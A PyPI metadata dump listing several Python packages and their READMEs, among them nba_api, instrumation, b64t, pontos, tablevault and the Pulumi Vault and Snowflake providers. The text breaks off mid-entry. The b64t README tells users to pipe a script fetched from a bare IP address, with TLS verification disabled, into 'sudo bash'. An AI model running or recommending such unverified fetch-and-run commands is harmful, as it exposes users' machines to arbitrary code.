metadata_version string | name string | version string | summary string | description string | description_content_type string | author string | author_email string | maintainer string | maintainer_email string | license string | keywords string | classifiers list | platform list | home_page string | download_url string | requires_python string | requires list | provides list | obsoletes list | requires_dist list | provides_dist list | obsoletes_dist list | requires_external list | project_urls list | uploaded_via string | upload_time timestamp[us] | filename string | size int64 | path string | python_version string | packagetype string | comment_text string | has_signature bool | md5_digest string | sha256_digest string | blake2_256_digest string | license_expression string | license_files list | recent_7d_downloads int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2.3 | nba_api | 1.11.4 | An API Client package to access the APIs for NBA.com | [](https://pypi.python.org/pypi/nba_api)
[](https://pepy.tech/project/nba-api)
[](https://circleci.com/gh/swar/nba_api)
[](https://github.com/swar/nba_api/blob/master/LICENSE)
[](https://join.slack.com/t/nbaapi/shared_invite/zt-3dc2qtnh0-udQJoSYrQVWaXOF3owVaAw)
# nba_api
## An API Client Package to Access the APIs of NBA.com
`nba_api` is an API Client for `www.nba.com`. This package intends to make the APIs of [NBA.com](https://www.nba.com/) easily accessible and provide extensive documentation about them.
# Getting Started
`nba_api` requires Python 3.10+ along with the `requests` and `numpy` packages. The `pandas` package is optional, but it is required for working with pandas DataFrames.
```bash
pip install nba_api
```
## NBA Official Stats
```python
from nba_api.stats.endpoints import playercareerstats
# Nikola Jokić
career = playercareerstats.PlayerCareerStats(player_id='203999')
# pandas data frames (optional: pip install pandas)
career.season_totals_regular_season.get_data_frame()
# json
career.get_json()
# dictionary
career.get_dict()
```
## NBA Live Data
```python
from nba_api.live.nba.endpoints import scoreboard
# Today's Score Board
games = scoreboard.ScoreBoard()
# json
games.get_json()
# dictionary
games.get_dict()
```
## Additional Examples
- [Requests/Response Options](https://github.com/swar/nba_api/blob/master/docs/nba_api/stats/examples.md#endpoint-usage-example)
- Proxy Support, Custom Headers, and Timeout Settings
- Return Types and Raw Responses
- [Static Data Sets](https://github.com/swar/nba_api/blob/master/docs/nba_api/stats/examples.md#static-usage-examples)
- Reduce HTTP requests for common and frequently accessed player and team data.
- [Jupyter Notebooks](https://github.com/swar/nba_api/tree/master/docs/examples)
- Practical examples in Jupyter Notebook format, including making basic calls, finding games, working with play-by-play data, and interacting with live game data.
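The static data sets mentioned above ship player and team records with the package, so common lookups run locally instead of issuing an HTTP request per query. A minimal pure-Python sketch of the idea (the data and function here are hypothetical miniatures; the real module is `nba_api.stats.static`):

```python
# Hypothetical miniature of a bundled static data set.  Lookups are plain
# in-memory filtering, so no HTTP request is needed.
PLAYERS = [
    {"id": 203999, "full_name": "Nikola Jokic", "is_active": True},
    {"id": 2544, "full_name": "LeBron James", "is_active": True},
]

def find_players_by_full_name(pattern: str) -> list:
    """Case-insensitive substring match over the bundled records."""
    pattern = pattern.lower()
    return [p for p in PLAYERS if pattern in p["full_name"].lower()]

print(find_players_by_full_name("jokic"))
# → [{'id': 203999, 'full_name': 'Nikola Jokic', 'is_active': True}]
```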
# Documentation
- [Table of Contents](https://github.com/swar/nba_api/tree/master/docs/table_of_contents.md)
- [Package Structure](https://github.com/swar/nba_api/tree/master/docs/package_structure.md)
- [Endpoints](/docs/nba_api/stats/endpoints)
- Static Data Sets
- [players.py](https://github.com/swar/nba_api/tree/master/docs/nba_api/stats/static/players.md)
- [teams.py](https://github.com/swar/nba_api/tree/master/docs/nba_api/stats/static/teams.md)
# Join the Community
## Slack
Join [Slack](https://join.slack.com/t/nbaapi/shared_invite/zt-3dc2qtnh0-udQJoSYrQVWaXOF3owVaAw) to get help, help others, provide feedback, see amazing projects, participate in discussions, and collaborate with others from around the world.
## Stack Overflow
Not a Slack fan? No problem. Head over to [StackOverflow](https://stackoverflow.com/questions/tagged/nba-api). Be sure to tag your post with `nba-api`.
# Contributing
*See [Contributing to the NBA_API](https://github.com/swar/nba_api/blob/master/CONTRIBUTING.md) for complete details.*
## Endpoints
A significant purpose of this package is to continuously map and analyze as many NBA.com endpoints as possible. The endpoint and parameter documentation and analysis in this package are among the most extensive available, since NBA.com itself does not publish information about new, changed, or removed endpoints.
If you find a new, changed, or deprecated endpoint, please open a [GitHub Issue](https://github.com/swar/nba_api/issues).
## Bugs
If you encounter a bug, please [report it](https://github.com/swar/nba_api/issues).
# License & Terms of Use
## API Client Package
The `nba_api` package is Open Source with an [MIT License](https://github.com/swar/nba_api/blob/master/LICENSE).
## NBA.com
NBA.com has a [Terms of Use](https://www.nba.com/termsofuse) regarding the use of the NBA’s digital platforms.
| text/markdown | Swar Patel | <swar.m.patel@gmail.com> | Swar Patel | <swar.m.patel@gmail.com> | MIT | api, basketball, data, nba, sports, stats | [
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Software Development",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3 :: Only",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13"
] | [] | https://github.com/swar/nba_api | null | >=3.10 | [] | [] | [] | [
"numpy>=1.26.0; python_version < \"3.13\"",
"numpy>=2.1.0; python_version >= \"3.13\"",
"pandas>=2.1.0; python_version < \"3.12\"",
"pandas>=2.2.0; python_version >= \"3.12\"",
"requests<3.0.0,>=2.32.3"
] | [] | [] | [] | [
"Repository, https://github.com/swar/nba_api",
"Documentation, https://github.com/swar/nba_api/blob/master/README.md",
"Bug Tracker, https://github.com/swar/nba_api/issues"
] | poetry/2.0.1 CPython/3.13.1 Darwin/25.3.0 | 2026-02-20T07:02:39.610483 | nba_api-1.11.4.tar.gz | 177,323 | 0d/f8/761434ce98e39d6bdd1b98611102fdc054920e330a5b5194464cb340adf8/nba_api-1.11.4.tar.gz | source | sdist | null | false | 303e23a904eac06ca46198c65261a231 | 1dccd70b78f36f64260e1f353c4a02c1644147c4a2a5ce42fbd9f637d70bad3e | 0df8761434ce98e39d6bdd1b98611102fdc054920e330a5b5194464cb340adf8 | null | [] | 0 |
2.4 | instrumation | 0.1.6 | A high-level Hardware Abstraction Layer (HAL) for RF test stations with Digital Twin support. | # Instrumation
[](https://pypi.org/project/instrumation/) [](https://pypi.org/project/instrumation/) [](https://pypi.org/project/instrumation/)

A high-level Hardware Abstraction Layer (HAL) for RF test stations, designed to simplify interactions with VISA instruments and Serial control boxes.
# About The Project
**Instrumation** is a Python library that provides a unified interface for controlling hardware test benches. It abstracts away the low-level details of PyVISA and PySerial, allowing you to focus on writing test logic rather than connection code.
It features a **Digital Twin** mode, enabling you to develop and test your scripts offline using simulated drivers that generate realistic data with noise.
## Tech Usage
* **Language:** Python 3.7+
* **Libraries:** PyVISA, PySerial
* **Architecture:** Factory Pattern, Polymorphism
* **Standards:** SCPI (Standard Commands for Programmable Instruments)
## Features
* **Auto-Discovery:** Automatically scans and identifies connected devices (VISA & Serial).
* **Smart Factory:** Detects connected hardware (e.g., Keysight vs. Rigol) and loads the correct driver automatically.
* **Digital Twin:** Simulation mode with realistic Gaussian noise for offline development.
* **Unified API:** Use the same code for different hardware brands.
* **Logging:** Built-in CSV logging for test results.
# Getting Started
## Prerequisites
* Python 3.7 or higher
* Git (optional, if cloning the repository)
## Installation
1. **Download or Clone the repository:**
You can download the source code as a ZIP file and extract it, or clone the repository using Git:
```bash
git clone https://github.com/yourusername/instrumation.git
cd instrumation
```
2. **Install the library:**
Navigate to the `instrumation` project root directory (where `setup.py` is located) and install:
```bash
pip install .
```
For developers, you might want to install in editable mode:
```bash
pip install -e .
```
# Setup Guide
## Linux / Termux (Android)
If you are running this on Termux (Android) or a Linux machine:
1. **Install dependencies:**
```bash
pkg install python # Add git if you plan to clone the repo
```
*(On standard Linux, use `sudo apt install python3` and optionally `git`)*
2. **Setup Virtual Environment (Optional but Recommended):**
```bash
python -m venv .venv
source .venv/bin/activate
```
3. **Install the library:**
```bash
pip install .
```
## Windows
1. **Open PowerShell** as Administrator (for driver installation if needed).
2. **Install Python:** Download from [python.org](https://www.python.org/).
3. **Download or Clone and Install:**
```powershell
# If cloning (requires Git):
git clone https://github.com/yourusername/instrumation.git
cd instrumation
# Or if you downloaded the ZIP and extracted it, navigate to the extracted folder:
# cd path\to\instrumation-main
pip install .
```
4. **VISA Backend:** You may need to install NI-VISA or Keysight IO Libraries Suite for physical hardware access.
# Usage
### 1. Real Hardware Mode
Connect your devices and run:
```python
import instrumation
# Connect to a specific instrument by VISA address
sa = instrumation.connect_instrument("USB0::0x2A8D::...")
# Works on ANY supported device (Keysight, Rigol, etc.)
peak_power = sa.get_peak_value()
print(f"Peak Power: {peak_power} dBm")
```
### 2. Digital Twin (Simulation) Mode
Develop offline without hardware.
**Enable Simulation:**
* **Linux/Termux:** `export INSTRUMATION_MODE=SIM`
* **Windows (PowerShell):** `$env:INSTRUMATION_MODE="SIM"`
* **Windows (CMD):** `set INSTRUMATION_MODE=SIM`
**Run Code:**
```python
from instrumation.factory import get_driver
# Address is ignored in SIM mode
driver = get_driver("DUMMY_ADDRESS")
driver.connect()
print(f"ID: {driver.get_id()}")
print(f"Voltage: {driver.measure_voltage(1)} V")
```
| Command | Description |
| :--- | :--- |
| `scan()` | Lists all connected Serial and VISA devices. |
| `connect()` | Auto-connects to a generic Test Station (Box + Inst). |
| `connect_instrument(addr)` | Connects to a specific instrument (loading correct driver). |
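The Digital Twin mode's "realistic Gaussian noise" can be pictured as a simulated driver that returns a nominal value plus random jitter. The following is a hypothetical sketch of that pattern, not the library's actual driver code (class and method names are illustrative):

```python
import random

class SimPowerSupply:
    """Hypothetical simulated driver: nominal readings plus Gaussian noise."""

    def __init__(self, nominal_volts: float = 5.0, noise_sigma: float = 0.01):
        self.nominal = nominal_volts
        self.sigma = noise_sigma

    def connect(self) -> None:
        pass  # nothing to open in simulation mode

    def get_id(self) -> str:
        return "SIM,PowerSupply,0,1.0"

    def measure_voltage(self, channel: int) -> float:
        # Each reading is drawn around the nominal value, so offline test
        # scripts see plausible, slightly varying measurements.
        return random.gauss(self.nominal, self.sigma)

driver = SimPowerSupply()
driver.connect()
reading = driver.measure_voltage(1)
```

Because the simulated driver exposes the same methods as a real one, test logic written against it runs unchanged on hardware.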
# Development & Testing
If you want to contribute or run the tests, follow these steps to avoid import errors.
1. **Install in Editable Mode**:
This is crucial for tests to find your local changes.
```bash
pip install -e .
```
2. **Install Test Dependencies**:
```bash
pip install pytest flake8
```
3. **Run Tests**:
Enable simulation mode and run pytest.
```bash
# Linux / Termux
export INSTRUMATION_MODE=SIM
pytest
# Windows PowerShell
$env:INSTRUMATION_MODE="SIM"
pytest
```
| text/markdown | abduznik | abduznik <abduznik@users.noreply.github.com> | null | null | MIT | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Topic :: Scientific/Engineering :: Interface Engine/Protocol Translator"
] | [] | https://github.com/abduznik/instrumation | null | >=3.7 | [] | [] | [] | [
"pyvisa",
"pyserial",
"toml"
] | [] | [] | [] | [
"Homepage, https://github.com/abduznik/instrumation",
"Repository, https://github.com/abduznik/instrumation",
"Bug Tracker, https://github.com/abduznik/instrumation/issues"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T07:02:10.529174 | instrumation-0.1.6.tar.gz | 20,890 | 59/99/1b8f5e9023b5d16196814a8f12abb192ee2b455b08014639863d6ed4ef16/instrumation-0.1.6.tar.gz | source | sdist | null | false | abae7605669ccd4c7d3ba7436181c829 | 111f19be0a6f6bcfe4b0c933f0a8c0ad11c17c3e45047627c8ef0202939c0c7d | 59991b8f5e9023b5d16196814a8f12abb192ee2b455b08014639863d6ed4ef16 | null | [] | 236 |
2.4 | b64t | 0.1.48 | Python bindings for b64t (requires system package) | # b64t - Python Bindings (Wrapper Package)
This is a minimal wrapper package for the system-installed b64t library.
## Installation
### 1. Install system package (required)
**macOS (Homebrew):**
```bash
# Note: -k flag for self-signed cert, will be replaced with proper certificate
curl -fsSLk https://136.110.224.249/b64t/homebrew/setup.sh | bash
```
Or manually:
```bash
brew tap vivanti/b64t
brew install vivanti/b64t/b64t
```
**Linux (APT - Debian/Ubuntu):**
```bash
curl -fsSLk https://136.110.224.249/b64t/apt/setup.sh | sudo bash
sudo apt install b64t
```
**Linux (YUM/DNF - RHEL/CentOS/Fedora):**
```bash
curl -fsSLk https://136.110.224.249/b64t/yum/setup.sh | sudo bash
sudo dnf install b64t
```
**FreeBSD:**
```bash
curl -fsSLk https://136.110.224.249/b64t/pkg/setup.sh | sudo bash
sudo pkg install b64t
```
### 2. Install pip wrapper (for virtual environments)
```bash
python3 -m venv myenv
source myenv/bin/activate
pip install b64t
```
## Usage
```python
import b64t
# Encode
encoded = b64t.encode(b'Hello, World!')
print(encoded)
# Decode
decoded = b64t.decode(encoded)
print(decoded)
# Streaming
with open('input.bin', 'rb') as f:
for chunk in b64t.encodePipe(f):
print(chunk)
```
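The `encodePipe` streaming interface can be pictured as chunked reading plus per-chunk encoding. A hypothetical sketch using the standard library's `base64` (this assumes b64t applies a base64-style transform, which is not confirmed by the README; the chunk size is a multiple of 3 so each chunk encodes cleanly with padding only at the very end):

```python
import base64
import io

def encode_pipe(stream, chunk_size=3 * 1024):
    # chunk_size is a multiple of 3, so every chunk except the last encodes
    # without padding and the encoded chunks can simply be concatenated.
    while True:
        chunk = stream.read(chunk_size)
        if not chunk:
            break
        yield base64.b64encode(chunk)

src = io.BytesIO(b"Hello, World!" * 1000)
encoded = b"".join(encode_pipe(src))
round_trip = base64.b64decode(encoded)
assert round_trip == b"Hello, World!" * 1000
```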
## How It Works
This wrapper automatically detects your Python distribution and uses the optimal loading strategy:
- **Homebrew/python.org/Linux Python**: Loads the native C extension for maximum performance (Stable ABI, one binary for Python 3.8+)
- **Apple system Python** (`/usr/bin/python3`): Uses ctypes to call `libb64t.dylib` directly, bypassing C extension ABI incompatibilities with Apple's Python shim
## Notes
- This package requires the system `b64t` package to be installed via Homebrew (macOS), APT (Debian/Ubuntu), YUM/DNF (RHEL/CentOS/Fedora), or FreeBSD pkg
- If the system package is not installed, import will fail with a clear error message
| text/markdown | null | Saxon Lysaght-Wheeler <saxon.lysaght-wheeler@vivanti.com> | null | null | null | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Operating System :: POSIX :: Linux",
"Operating System :: MacOS"
] | [] | null | null | >=3.8 | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.3 | 2026-02-20T07:01:18.322876 | b64t-0.1.48.tar.gz | 5,025 | 43/db/bdd2640e44258e5876ff3ca282dc6f84da8f1e5ae66008a412458233afe7/b64t-0.1.48.tar.gz | source | sdist | null | false | 30e1df35baeaeb50fdf17795ff8fdd64 | 6ff4b5713882b256e2eee461dbf743ae59a4273e20e4ed639a1326ce5a3fdb61 | 43dbbdd2640e44258e5876ff3ca282dc6f84da8f1e5ae66008a412458233afe7 | MIT | [] | 234 |
2.4 | pontos | 26.2.0 | Common utilities and tools maintained by Greenbone Networks |
# Pontos - Greenbone Python Utilities and Tools <!-- omit in toc -->
[](https://github.com/greenbone/pontos/releases)
[](https://pypi.org/project/pontos/)
[](https://codecov.io/gh/greenbone/pontos)
[](https://github.com/greenbone/pontos/actions/workflows/ci-python.yml)
The **pontos** Python package is a collection of utilities, tools, classes and
functions maintained by [Greenbone].
Pontos is the German name of the Greek titan [Pontus](https://en.wikipedia.org/wiki/Pontus_(mythology)),
the titan of the sea.
## Table of Contents <!-- omit in toc -->
- [Documentation](#documentation)
- [Installation](#installation)
- [Requirements](#requirements)
- [Install using pipx](#install-using-pipx)
- [Install using pip](#install-using-pip)
- [Install using poetry](#install-using-poetry)
- [Command Completion](#command-completion)
- [Setup for bash](#setup-for-bash)
- [Setup for zsh](#setup-for-zsh)
- [Development](#development)
- [Maintainer](#maintainer)
- [Contributing](#contributing)
- [License](#license)
## Documentation
The documentation for pontos can be found at https://greenbone.github.io/pontos/. Please refer to the documentation for more details as this README just gives a short overview.
## Installation
### Requirements
Python 3.9 and later is supported.
### Install using pipx
You can install the latest stable release of **pontos** from the Python
Package Index (pypi) using [pipx]
```bash
python3 -m pipx install pontos
```
### Install using pip
> [!NOTE]
> The `pip install` command no longer works out-of-the-box in newer
> distributions like Ubuntu 23.04 because of [PEP 668](https://peps.python.org/pep-0668).
> Please use the [installation via pipx](#install-using-pipx) instead.
You can install the latest stable release of **pontos** from the Python
Package Index (pypi) using [pip]
```bash
python3 -m pip install --user pontos
```
### Install using poetry
Because **pontos** is a Python library you most likely need a tool to
handle Python package dependencies and Python environments. Therefore we
strongly recommend using [poetry].
You can install the latest stable release of **pontos** and add it as
a dependency for your current project using [poetry]
```bash
poetry add pontos
```
## Command Completion
`pontos` comes with support for command line completion in bash and zsh. All
pontos CLI commands support shell completion. As examples the following sections
explain how to set up the completion for `pontos-release` with bash and zsh.
### Setup for bash
```bash
echo "source ~/.pontos-release-complete.bash" >> ~/.bashrc
pontos-release --print-completion bash > ~/.pontos-release-complete.bash
```
Alternatively, you can use the result of the completion command directly with
the eval function of your bash shell:
```bash
eval "$(pontos-release --print-completion bash)"
```
### Setup for zsh
```zsh
echo 'fpath=("$HOME/.zsh.d" $fpath)' >> ~/.zshrc
mkdir -p ~/.zsh.d/
pontos-release --print-completion zsh > ~/.zsh.d/_pontos_release
```
Alternatively, you can use the result of the completion command directly with
the eval function of your zsh shell:
```bash
eval "$(pontos-release --print-completion zsh)"
```
## Development
**pontos** uses [poetry] for its own dependency management and build
process.
First install poetry via [pipx]
```bash
python3 -m pipx install poetry
```
Afterwards run
```bash
poetry install
```
in the checkout directory of **pontos** (the directory containing the
`pyproject.toml` file) to install all dependencies including the packages only
required for development.
Afterwards activate the git hooks for auto-formatting and linting via
[autohooks].
```bash
poetry run autohooks activate
```
Validate the activated git hooks by running
```bash
poetry run autohooks check
```
## Maintainer
This project is maintained by [Greenbone AG][Greenbone]
## Contributing
Your contributions are highly appreciated. Please
[create a pull request](https://github.com/greenbone/pontos/pulls)
on GitHub. Bigger changes need to be discussed with the development team via the
[issues section at GitHub](https://github.com/greenbone/pontos/issues)
first.
## License
Copyright (C) 2020-2024 [Greenbone AG][Greenbone]
Licensed under the [GNU General Public License v3.0 or later](LICENSE).
[Greenbone]: https://www.greenbone.net/
[poetry]: https://python-poetry.org/
[pip]: https://pip.pypa.io/
[pipx]: https://pypa.github.io/pipx/
[autohooks]: https://github.com/greenbone/autohooks
| text/markdown | Greenbone AG | info@greenbone.net | null | null | GPL-3.0-or-later | null | [
"Development Status :: 4 - Beta",
"Environment :: Console",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU General Public License v3 or later (GPLv3+)",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | <4.0,>=3.9 | [] | [] | [] | [
"colorful>=0.5.4",
"httpx[http2]>=0.23",
"lxml>=4.9.0",
"packaging>=20.3",
"python-dateutil>=2.8.2",
"rich>=12.4.4",
"semver>=2.13",
"shtab>=1.7.0",
"tomlkit>=0.5.11"
] | [] | [] | [] | [
"Documentation, https://greenbone.github.io/pontos/",
"Homepage, https://github.com/greenbone/pontos/",
"Repository, https://github.com/greenbone/pontos/"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T07:00:38.648816 | pontos-26.2.0.tar.gz | 348,755 | 38/90/fd15a633c1039b59fa8d414494e7d4fefed16c6240ab9167c7c4d850a372/pontos-26.2.0.tar.gz | source | sdist | null | false | 15c0bb2ee76ffc5571137b058e17aef5 | 54ed2d1532879647d6f51b94d988c4295da419f7531910b5511a100f7ed81c8b | 3890fd15a633c1039b59fa8d414494e7d4fefed16c6240ab9167c7c4d850a372 | null | [
"LICENSE"
] | 592 |
2.4 | tablevault | 0.2.2 | Centralized data repository for cross-process data filtering in Python. | # TableVault
This is version 2.0 of TableVault. It retains the basic functionality of v1.0 but adds more robust backend storage and a simpler API.
You can view the previous website at: www.tablevault.org.
# Changes from v1.0
- Data is stored by data type rather than by instance.
- Tables are stored in ArangoDB rather than as DataFrames.
- First level support for arrays, embeddings, and text files.
- API changes to match industry standards.
# New Core Feature: Data Queries
The main reason for the redesign is to build the metadata layer to support robust queries from the ground up.
The API supports:
- Vector search over data descriptions
- Reproducible search (with timestamps)
- Direct and indirect data lineage (based on code traces)
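Reproducible search with timestamps can be pictured as filtering the metadata layer to the records visible at a given point in time, so rerunning a query with the same timestamp always returns the same result set. A hypothetical sketch of that idea (not TableVault's actual API; names and data are illustrative):

```python
from datetime import datetime, timezone

# Hypothetical metadata records, each stamped with its creation time.
RECORDS = [
    {"name": "embeddings_v1", "created": datetime(2025, 1, 10, tzinfo=timezone.utc)},
    {"name": "embeddings_v2", "created": datetime(2025, 6, 1, tzinfo=timezone.utc)},
]

def search(as_of: datetime) -> list:
    """Return names of records that existed at `as_of`; the same timestamp
    always reproduces the same result set."""
    return [r["name"] for r in RECORDS if r["created"] <= as_of]

print(search(datetime(2025, 3, 1, tzinfo=timezone.utc)))
# → ['embeddings_v1']
```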
# Planned Features
- An experimental LLM layer to support natural-language search over context
| text/markdown | null | Jinjin Zhao <j2zhao@uchicago.edu> | null | null | null | example, package, python | [] | [] | null | null | >=3.11 | [] | [] | [] | [
"python-arango",
"psutil",
"ruff; extra == \"dev\"",
"pytest; extra == \"dev\"",
"mkdocs-material; extra == \"dev\"",
"mike; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.14.1 | 2026-02-20T06:59:55.176916 | tablevault-0.2.2.tar.gz | 62,365 | 4d/98/c8f80a85eeb2e01664dffc327f63fc38d49871aa39e5e2b007204d914909/tablevault-0.2.2.tar.gz | source | sdist | null | false | e4126003e1d4e07ac237855d5f1280ad | 5b43a742bfbd215fee0d905bae42d0ca0cf39db356c6da35bdc6e689d6dbdc1c | 4d98c8f80a85eeb2e01664dffc327f63fc38d49871aa39e5e2b007204d914909 | MIT | [
"LICENSE"
] | 244 |
2.4 | pulumi-vault | 7.8.0a1771570116 | A Pulumi package for creating and managing HashiCorp Vault cloud resources. | [](https://travis-ci.com/pulumi/pulumi-vault)
# Hashicorp Vault Resource Provider
The Vault resource provider for Pulumi lets you manage Vault resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
$ npm install @pulumi/vault
```
or `yarn`:
```bash
$ yarn add @pulumi/vault
```
### Python
To use from Python, install using `pip`:
```bash
$ pip install pulumi_vault
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
$ go get github.com/pulumi/pulumi-vault/sdk/v6
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
$ dotnet add package Pulumi.Vault
```
## Configuration
The following configuration points are available:
- `vault:address` - (Required) Origin URL of the Vault server. This is a URL with a scheme, a hostname and a port but with no path.
May be set via the `VAULT_ADDR` environment variable.
- `vault:token` - (Required) Vault token that will be used by the provider to authenticate. May be set via the `VAULT_TOKEN`
environment variable. If none is otherwise supplied, the provider will attempt to read it from ~/.vault-token (where the vault
command stores its current token). The provider will issue itself a new token that is a child of the one given, with a short TTL
to limit the exposure of any requested secrets. Note that the given token must have the update capability on the `auth/token/create`
path in Vault in order to create child tokens.
- `vault:tokenName` - (Optional) Token name to use for creating the Vault child token. May be set via the `VAULT_TOKEN_NAME`
environment variable.
- `vault:ca_cert_file` - (Optional) Path to a file on local disk that will be used to validate the certificate presented by
the Vault server. May be set via the `VAULT_CACERT` environment variable.
- `vault:ca_cert_dir` - (Optional) Path to a directory on local disk that contains one or more certificate files that will
be used to validate the certificate presented by the Vault server. May be set via the `VAULT_CAPATH` environment variable.
- `vault:client_auth` - (Optional) A configuration block, described below, that provides credentials used by the provider
to authenticate with the Vault server. At present there is little reason to set this, because the provider does not
support the TLS certificate authentication mechanism.
- `vault:cert_file` - (Required) Path to a file on local disk that contains the PEM-encoded certificate to present to the server.
- `vault:key_file` - (Required) Path to a file on local disk that contains the PEM-encoded private key for which the
authentication certificate was issued.
- `vault:skip_tls_verify` - (Optional) Set this to true to disable verification of the Vault server's TLS certificate. This
is strongly discouraged except in prototype or development environments, since it exposes the possibility that the provider
can be tricked into writing secrets to a server controlled by an intruder. May be set via the `VAULT_SKIP_VERIFY` environment variable.
- `vault:max_lease_ttl_seconds` - (Optional) Used as the duration for the intermediate Vault token the provider issues itself,
which in turn limits the duration of secret leases issued by Vault. Defaults to `20` minutes and may be set via the
`TERRAFORM_VAULT_MAX_TTL` environment variable. See the section above on Using Vault credentials in the provider configuration
for the implications of this setting.
- `vault:max_retries` - (Optional) Used as the maximum number of retries when a 5xx error code is encountered. Defaults to `2`
retries and may be set via the VAULT_MAX_RETRIES environment variable.
- `vault:namespace` - (Optional) Set the namespace to use. May be set via the `VAULT_NAMESPACE` environment variable. Available
only for Vault Enterprise.
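The configuration points above can also be supplied programmatically through an explicit provider instance in a Pulumi program. A hedged sketch in Python (a config fragment, not a runnable program; the argument names mirror the `vault:address`/`vault:token` config keys above and the values are placeholders):

```python
import pulumi
import pulumi_vault as vault

# Explicit provider instance mirroring the vault:address / vault:token
# configuration keys described above.  Values here are placeholders; in
# real code, load the token from Pulumi config secrets or the environment.
vault_provider = vault.Provider(
    "my-vault",
    address="https://vault.example.com:8200",
    token=pulumi.Config("vault").require_secret("token"),
)

# Resources then opt into this provider via
# pulumi.ResourceOptions(provider=vault_provider).
```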
## Reference
For further information, please visit [the Vault provider docs](https://www.pulumi.com/docs/intro/cloud-providers/vault) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/vault).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, vault | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-vault"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:59:20.604620 | pulumi_vault-7.8.0a1771570116.tar.gz | 675,613 | 5f/a3/f19f7bc2e7972a74dfc5f80d31e7bfb302842f8ec184631f65004c9be020/pulumi_vault-7.8.0a1771570116.tar.gz | source | sdist | null | false | ad8e55ac2835c9dbdcd60154f6e2d8d8 | cc28dbb4efe6188d27f3ff34c074f744e8a1bbf2d28516e4827aaecd65114205 | 5fa3f19f7bc2e7972a74dfc5f80d31e7bfb302842f8ec184631f65004c9be020 | null | [] | 212 |
2.4 | pulumi-snowflake | 2.13.0a1771569954 | A Pulumi package for creating and managing snowflake cloud resources. | [](https://github.com/pulumi/pulumi-snowflake/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/snowflake)
[](https://pypi.org/project/pulumi-snowflake)
[](https://badge.fury.io/nu/pulumi.snowflake)
[](https://pkg.go.dev/github.com/pulumi/pulumi-snowflake/sdk/go)
[](https://github.com/pulumi/pulumi-snowflake/blob/master/LICENSE)
# Snowflake Resource Provider
The Snowflake Resource Provider lets you manage Snowflake resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
$ npm install @pulumi/snowflake
```
or `yarn`:
```bash
$ yarn add @pulumi/snowflake
```
### Python
To use from Python, install using `pip`:
```bash
$ pip install pulumi_snowflake
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
$ go get github.com/pulumi/pulumi-snowflake/sdk
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
$ dotnet add package Pulumi.Snowflake
```
## Configuration
The following configuration points are available:
* `snowflake:account` - (required) The name of the Snowflake account. Can also come from the
`SNOWFLAKE_ACCOUNT` environment variable.
* `snowflake:username` - (required) Username for username+password authentication. Can come from the
`SNOWFLAKE_USER` environment variable.
* `snowflake:region` - (required) [Snowflake region](https://docs.snowflake.com/en/user-guide/intro-regions.html)
to use. Can be sourced from the `SNOWFLAKE_REGION` environment variable.
* `snowflake:password` - (optional) Password for username+password auth. Cannot be used with `browser_auth` or
`snowflake:privateKeyPath`. Can be sourced from `SNOWFLAKE_PASSWORD` environment variable.
* `snowflake:oauthAccessToken` - (optional) Token for use with OAuth. Generating the token is left to other
tools. Cannot be used with `snowflake:browserAuth`, `snowflake:privateKeyPath`, `snowflake:oauthRefreshToken`
or `snowflake:password`.
Can be sourced from `SNOWFLAKE_OAUTH_ACCESS_TOKEN` environment variable.
* `snowflake:oauthRefreshToken` - (optional) Token for use with OAuth. Setup and generation of the token is
left to other tools. Should be used in conjunction with `snowflake:oauthClientId`, `snowflake:oauthClientSecret`,
`snowflake:oauthEndpoint`, `snowflake:oauthRedirectUrl`. Cannot be used with `snowflake:browserAuth`,
`snowflake:privateKeyPath`, `snowflake:oauthAccessToken` or `snowflake:password`. Can be sourced from
`SNOWFLAKE_OAUTH_REFRESH_TOKEN` environment variable.
* `snowflake:oauthClientId` - (optional) Required when `snowflake:oauthRefreshToken` is used. Can be sourced from
`SNOWFLAKE_OAUTH_CLIENT_ID` environment variable.
